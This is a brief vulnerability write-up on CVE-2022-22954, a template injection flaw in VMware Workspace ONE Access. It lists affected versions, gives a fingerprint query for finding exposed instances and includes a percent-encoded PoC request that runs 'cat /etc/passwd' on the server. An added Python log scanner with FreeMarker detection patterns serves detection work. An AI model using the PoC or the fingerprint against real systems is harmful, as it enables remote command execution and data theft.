VMware Workspace ONE Access SSTI Vulnerability CVE-2022-22954
Vulnerability Description
VMware Workspace ONE Access (formerly known as VMware Identity Manager) is designed to give your employees faster access to SaaS, Web, and native mobile applications with multi-factor authentication, conditional access, and single sign-on.
Vulnerability Impact
VMware Workspace ONE Access Appliance (versions: 20.10.0.0, 20.10.0.1, 21.08.0.0, 21.08.0.1)
VMware Identity Manager Appliance (versions: 3.3.3, 3.3.4, 3.3.5, 3.3.6)
VMware vRealize Automation (version: 7.6)
Network asset mapping (search fingerprint)
app="vmware-Workspace-ONE-Access"
Vulnerability reproduction
Login page
Verification PoC
/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d
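A defender-side check for the request above, as an added example that is not part of the original post: it scans web access log lines for `deviceUdid` values on this endpoint that decode to FreeMarker expression syntax. The combined log format, the sample lines and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

WATCHED_PATH = "/catalog-portal/ui/oauth/verify"  # endpoint from the PoC
WATCHED_PARAM = "deviceUdid"
# FreeMarker syntax that has no place in a device identifier.
SSTI_MARKERS = [
    re.compile(r"\$\{"),                                   # interpolation
    re.compile(r"<#"),                                     # directive
    re.compile(r"freemarker\.template\.utility\.", re.I),  # utility classes
    re.compile(r"\?\s*new\s*\(", re.I),                    # ?new() built-in
]
LOG_REQ = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed lines; addresses are documentation ranges
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=ABC123-DEF HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b7*7%7d HTTP/1.1" 400 1024',
    '203.0.113.5 - - [01/Jan/2024:10:00:09 +0000] "GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%2524%257b7*7%257d HTTP/1.1" 400 1024',
]

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is also seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_request(request_target):
    """Return the marker patterns found in deviceUdid, or [] if clean."""
    parts = urlsplit(request_target)
    if parts.path.rstrip("/") != WATCHED_PATH:
        return []
    hits = []
    for raw in parse_qs(parts.query, keep_blank_values=True).get(WATCHED_PARAM, []):
        text = fully_decode(raw)  # parse_qs has already decoded once
        hits += [m.pattern for m in SSTI_MARKERS if m.search(text)]
    return hits

def scan_access_log(lines):
    """Yield (client_ip, hits) for each log line with a suspicious value."""
    for line in lines:
        m = LOG_REQ.match(line)
        hits = inspect_request(m.group(2)) if m else []
        if hits:
            yield m.group(1), hits

if __name__ == "__main__":
    print(list(scan_access_log(SAMPLE_LOG)))
```
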
This post is licensed under CC BY 4.0 by the author.